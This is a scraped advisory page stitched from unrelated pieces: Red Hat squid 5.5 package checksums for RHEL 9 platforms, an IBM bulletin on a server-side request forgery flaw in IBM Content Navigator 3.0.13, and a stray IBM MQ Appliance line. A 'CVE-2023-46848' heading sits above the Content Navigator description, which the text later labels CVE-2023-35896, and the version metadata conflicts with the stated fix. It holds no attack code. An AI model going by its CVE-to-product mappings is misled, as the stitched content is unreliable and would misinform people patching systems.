SHA-256: fcdf1fd8cf2c420b948fa52c9f80b2a7797019eaac8609ec2b7473b8232bb032

**Red Hat Enterprise Linux for Power, little endian 9**

SRPM

squid-5.5-5.el9\_2.1.src.rpm

SHA-256: 7fa87ba53df94437a7b1a3e457e7b607cfcbb01e46e4dd9ea2a242400aee5378

ppc64le

squid-5.5-5.el9\_2.1.ppc64le.rpm

SHA-256: c87df4643cbc5ad3878aaac63e6476509630debf30d6f6b3b0280305de4024b3

squid-debuginfo-5.5-5.el9\_2.1.ppc64le.rpm

SHA-256: 65f115bf2144a84d567402cc8fce5ff76c0de5a9dca332c420c73d00d897242d

squid-debugsource-5.5-5.el9\_2.1.ppc64le.rpm

SHA-256: 806cadb3a72f847f3da1815505132ceea37d74833886164e0001f7d78b017283

**Red Hat Enterprise Linux for Power, little endian - Extended Update Support 9.2**

SRPM

squid-5.5-5.el9\_2.1.src.rpm

SHA-256: 7fa87ba53df94437a7b1a3e457e7b607cfcbb01e46e4dd9ea2a242400aee5378

ppc64le

squid-5.5-5.el9\_2.1.ppc64le.rpm

SHA-256: c87df4643cbc5ad3878aaac63e6476509630debf30d6f6b3b0280305de4024b3

squid-debuginfo-5.5-5.el9\_2.1.ppc64le.rpm

SHA-256: 65f115bf2144a84d567402cc8fce5ff76c0de5a9dca332c420c73d00d897242d

squid-debugsource-5.5-5.el9\_2.1.ppc64le.rpm

SHA-256: 806cadb3a72f847f3da1815505132ceea37d74833886164e0001f7d78b017283

**Red Hat Enterprise Linux for ARM 64 9**

SRPM

squid-5.5-5.el9\_2.1.src.rpm

SHA-256: 7fa87ba53df94437a7b1a3e457e7b607cfcbb01e46e4dd9ea2a242400aee5378

aarch64

squid-5.5-5.el9\_2.1.aarch64.rpm

SHA-256: 0082e586ad90c231a7118bb2d6ede0170431960a28cb12f8b940f93186dbec18

squid-debuginfo-5.5-5.el9\_2.1.aarch64.rpm

SHA-256: f88f5d166c97cca83b8a559fcbcc042dd6f1973b9a12a893aded4e3bf55d8dd2

squid-debugsource-5.5-5.el9\_2.1.aarch64.rpm

SHA-256: e8d7f161b26e64addfd4f30b9f6c0e5a7984049d72512a8288538187f0d95833

**Red Hat Enterprise Linux for ARM 64 - Extended Update Support 9.2**

SRPM

squid-5.5-5.el9\_2.1.src.rpm

SHA-256: 7fa87ba53df94437a7b1a3e457e7b607cfcbb01e46e4dd9ea2a242400aee5378

aarch64

squid-5.5-5.el9\_2.1.aarch64.rpm

SHA-256: 0082e586ad90c231a7118bb2d6ede0170431960a28cb12f8b940f93186dbec18

squid-debuginfo-5.5-5.el9\_2.1.aarch64.rpm

SHA-256: f88f5d166c97cca83b8a559fcbcc042dd6f1973b9a12a893aded4e3bf55d8dd2

squid-debugsource-5.5-5.el9\_2.1.aarch64.rpm

SHA-256: e8d7f161b26e64addfd4f30b9f6c0e5a7984049d72512a8288538187f0d95833

**Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.2**

SRPM

squid-5.5-5.el9\_2.1.src.rpm

SHA-256: 7fa87ba53df94437a7b1a3e457e7b607cfcbb01e46e4dd9ea2a242400aee5378

ppc64le

squid-5.5-5.el9\_2.1.ppc64le.rpm

SHA-256: c87df4643cbc5ad3878aaac63e6476509630debf30d6f6b3b0280305de4024b3

squid-debuginfo-5.5-5.el9\_2.1.ppc64le.rpm

SHA-256: 65f115bf2144a84d567402cc8fce5ff76c0de5a9dca332c420c73d00d897242d

squid-debugsource-5.5-5.el9\_2.1.ppc64le.rpm

SHA-256: 806cadb3a72f847f3da1815505132ceea37d74833886164e0001f7d78b017283

**Red Hat Enterprise Linux for x86\_64 - Update Services for SAP Solutions 9.2**

SRPM

squid-5.5-5.el9\_2.1.src.rpm

SHA-256: 7fa87ba53df94437a7b1a3e457e7b607cfcbb01e46e4dd9ea2a242400aee5378

x86\_64

squid-5.5-5.el9\_2.1.x86\_64.rpm

SHA-256: ed12a36d09c972d9786334fb79b3af03db66a572b559fd0c00629e178de4f491

squid-debuginfo-5.5-5.el9\_2.1.x86\_64.rpm

SHA-256: 18b16426a651fc55f4eba4629d9ea33e08994a77b809f4316929093fe6c6ca3c

squid-debugsource-5.5-5.el9\_2.1.x86\_64.rpm

SHA-256: 5b961038cd20090637fa915a096e09360736de9ef2f7acc94031b45aaf46f9d5

**Red Hat Enterprise Linux Server for ARM 64 - 4 years of updates 9.2**

SRPM

squid-5.5-5.el9\_2.1.src.rpm

SHA-256: 7fa87ba53df94437a7b1a3e457e7b607cfcbb01e46e4dd9ea2a242400aee5378

aarch64

squid-5.5-5.el9\_2.1.aarch64.rpm

SHA-256: 0082e586ad90c231a7118bb2d6ede0170431960a28cb12f8b940f93186dbec18

squid-debuginfo-5.5-5.el9\_2.1.aarch64.rpm

SHA-256: f88f5d166c97cca83b8a559fcbcc042dd6f1973b9a12a893aded4e3bf55d8dd2

squid-debugsource-5.5-5.el9\_2.1.aarch64.rpm

SHA-256: e8d7f161b26e64addfd4f30b9f6c0e5a7984049d72512a8288538187f0d95833

**Red Hat Enterprise Linux Server for IBM z Systems - 4 years of updates 9.2**

SRPM

squid-5.5-5.el9\_2.1.src.rpm

SHA-256: 7fa87ba53df94437a7b1a3e457e7b607cfcbb01e46e4dd9ea2a242400aee5378

s390x

squid-5.5-5.el9\_2.1.s390x.rpm

SHA-256: cf74de6cbfdb39db15256dded5590a7b394f74c95d93391bb2b222baa45dfddd

squid-debuginfo-5.5-5.el9\_2.1.s390x.rpm

SHA-256: 53ec7c67112ca23a5884710ebfb6ca574150aa24037ffe008af1e9a216bc5bc6

squid-debugsource-5.5-5.el9\_2.1.s390x.rpm

SHA-256: fcdf1fd8cf2c420b948fa52c9f80b2a7797019eaac8609ec2b7473b8232bb032

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

CVE-2023-46848

IBM Content Navigator 3.0.13 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks.  IBM X-Force ID:  259247.

  

**Summary**

Oracle Outside In Technology is used in some configurations of IBM Content Navigator as part of the document viewer. CVE-2023-35896.

**Vulnerability Details**

**CVEID:**   CVE-2023-35896  
**DESCRIPTION:**   IBM Content Navigator is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks.  
CVSS Base score: 5.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/259247 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N)

**Affected Products and Versions**

**Affected Product(s)**

**Version(s)** 

IBM Content Navigator

3.0.13

**Remediation/Fixes**

**Affected Product(s)**

**Version(s)**

**Remediation/Fix/Instructions**

IBM Content Navigator

3.0.13

Download 3.0.13 IF006 and follow instructions

**Workarounds and Mitigations**

Customers who do not use Oracle Outside In Technology are not affected.

**References**

Off

**Acknowledgement**

**Change History**

01 Nov 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU056","label":"Miscellaneous"},"Product":{"code":"SSEUEX","label":"IBM Content Navigator"},"Component":"","Platform":\[{"code":"PF033","label":"Windows"},{"code":"PF016","label":"Linux"}\],"Version":"3.0.14 IF2, 3.0.13 IF5, 3.0.11 IF13","Edition":"","Line of Business":{"code":"LOB18","label":"Miscellaneous LOB"}}\]

CVE-2023-35896: IBM Content Navigator is vulnerable to Server Side Request Forgery leading to Arbitrary File Read due to Oracle Outside In Technology (CVE-2023-35896)

IBM MQ Appliance 9.3 CD could allow a local attacker to gain elevated privileges on the system, caused by improper validation of security keys.  IBM X-Force ID:  269535.

Tag

#ibm